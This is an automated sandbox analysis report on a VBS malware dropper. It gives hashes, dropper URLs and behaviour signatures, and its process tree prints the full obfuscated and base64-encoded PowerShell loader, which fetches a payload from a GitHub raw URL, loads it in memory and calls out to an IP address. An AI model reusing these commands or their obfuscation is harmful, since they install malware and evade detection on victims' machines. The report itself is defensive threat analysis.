Analysis
-
max time kernel
117s -
max time network
117s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
-
submitted
02-10-2024 03:30
General
-
Target
e2da4bdc8ddb6ea24583b91f20a533ec87de790f22f475e29efc2b86a851c764.vbs
-
Size
284KB
-
MD5
530df3cee5771db37bb422520753d617
-
SHA1
7a68962efd7e8f0e5890376029485a192be6bd7d
-
SHA256
e2da4bdc8ddb6ea24583b91f20a533ec87de790f22f475e29efc2b86a851c764
-
SHA512
2f835e087906c1b86d0dd2b710c05a37db7d0c42c0e285c9f007565383e0a7e7e24caeaed40e244ba6f467b1b33fe86a8d230bed000f58707080de2edd2f1af2
-
SSDEEP
6144:FS1TjQvtuff2c5mMlaNkTbFxrmGjmI+swB//ETgAfXJo:cpjQsfb5mMNbFxrvjmHLBIgAfXJo
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
exe.dropper
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
Signatures
-
Blocklisted process makes network request 2 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 6 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e2da4bdc8ddb6ea24583b91f20a533ec87de790f22f475e29efc2b86a851c764.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRlblY6Q09tU1BFQ1s0LDI2LDI1XS1KT2luJycpKCgnWlhmdXJsID0nKycgJysncCcrJzUnKyd5aCcrJ3QnKyd0cHM6Ly8nKydyYXcuJysnZycrJ2knKyd0aCcrJ3VidXNlJysncmNvbnRlbnQuY28nKydtJysnL04nKydvRGUnKyd0JysnZWN0TycrJ24nKycvTm9EZScrJ3RlY3RPJysnbi8nKydyZScrJ2YnKydzL2hlYWRzL21haW4vRGUnKyd0JysnYWgnKydOb3RoLScrJ1YudHh0JysncDV5OycrJyAnKydaWCcrJ2ZiYXMnKydlNicrJzQnKydDb250ZW4nKyd0ID0gKCcrJ04nKydlJysndy1PYmonKydlJysnY3QnKycgU3lzdGVtJysnLk4nKydldC5XZWJDbGllbnQpLkRvd25sb2EnKydkJysnUycrJ3RyaW5nKFpYJysnZnUnKydyJysnbCk7IFonKydYZmInKydpbmFyeUNvbicrJ3RlJysnbnQgPSBbU3lzdCcrJ2VtJysnLkNvbnZlJysncnQnKyddOjonKydGJysncm9tQmFzZTY0U3QnKydyaScrJ25nKCcrJ1pYZmInKydhc2U2NEMnKydvbnQnKydlJysnbnQpOyBaJysnWGYnKydhc3NlbWInKydsJysneScrJyAnKyc9JysnIFtSJysnZWZsZScrJ2N0JysnaW9uLkEnKydzcycrJ2VtYmwnKyd5XTo6TG9hZChaJysnWGZiaW5hcnlDb250JysnZW50KScrJzsnKycgW2RuJysnbGknKydiLicrJ0knKydPLkhvbWUnKyddOjpWJysnQScrJ0koWk0nKydjdCcrJ3h0JysnLlJUVEhHJysnRicrJ1IvMCcrJzIvNDQuNycrJzcxJysnLicrJzknKycxJysnLjQzMS8vOnB0dGhaTWMsICcrJ1onKydNJysnY2QnKydlc2F0aXZhZG9aTScrJ2MnKycsIFpNY2Rlc2F0aXZhZG9aJysnTWMnKycsIFonKydNJysnY2QnKydlcycrJ2F0aXZhZG9aJysnTWMsIFpNY1JlZ0FzbScrJ1pNYywnKycgJysnWicrJ01jWk1jLFpNYycrJ1pNYyknKS5yRVBsQUNlKCdaWGYnLFtzdHJJbmddW0NIYXJdMzYpLnJFUGxBQ2UoJ1pNYycsW3N0ckluZ11bQ0hhcl0zNCkuckVQbEFDZSgncDV5Jyxbc3RySW5nXVtDSGFyXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $enV:COmSPEC[4,26,25]-JOin'')(('ZXfurl ='+' '+'p'+'5'+'yh'+'t'+'tps://'+'raw.'+'g'+'i'+'th'+'ubuse'+'rcontent.co'+'m'+'/N'+'oDe'+'t'+'ectO'+'n'+'/NoDe'+'tectO'+'n/'+'re'+'f'+'s/heads/main/De'+'t'+'ah'+'Noth-'+'V.txt'+'p5y;'+' '+'ZX'+'fbas'+'e6'+'4'+'Conten'+'t = ('+'N'+'e'+'w-Obj'+'e'+'ct'+' System'+'.N'+'et.WebClient).Downloa'+'d'+'S'+'tring(ZX'+'fu'+'r'+'l); Z'+'Xfb'+'inaryCon'+'te'+'nt = [Syst'+'em'+'.Conve'+'rt'+']::'+'F'+'romBase64St'+'ri'+'ng('+'ZXfb'+'ase64C'+'ont'+'e'+'nt); Z'+'Xf'+'assemb'+'l'+'y'+' '+'='+' [R'+'efle'+'ct'+'ion.A'+'ss'+'embl'+'y]::Load(Z'+'XfbinaryCont'+'ent)'+';'+' [dn'+'li'+'b.'+'I'+'O.Home'+']::V'+'A'+'I(ZM'+'ct'+'xt'+'.RTTHG'+'F'+'R/0'+'2/44.7'+'71'+'.'+'9'+'1'+'.431//:ptthZMc, '+'Z'+'M'+'cd'+'esativadoZM'+'c'+', ZMcdesativadoZ'+'Mc'+', Z'+'M'+'cd'+'es'+'ativadoZ'+'Mc, ZMcRegAsm'+'ZMc,'+' '+'Z'+'McZMc,ZMc'+'ZMc)').rEPlACe('ZXf',[strIng][CHar]36).rEPlACe('ZMc',[strIng][CHar]34).rEPlACe('p5y',[strIng][CHar]39))"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7KB
MD58782081f53e2459c80299cf4ddf00cc3
SHA12c19983d9725966bb4e676b6d093e27cfbdcd926
SHA25686f1fbddefeb6435e13b2d9386c9033bd0179ec9db0f405e301272acb2af7cdb
SHA51228370c785baf665671af8af729ce600650585412d07158f38db75ccb50a0b47e5c9a55ce20c138c169e7f98de0a7972911137536dce14bc400c46862ec680aa5
-
Filesize
4KB
-
Filesize
2.9MB
-
Filesize
32KB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB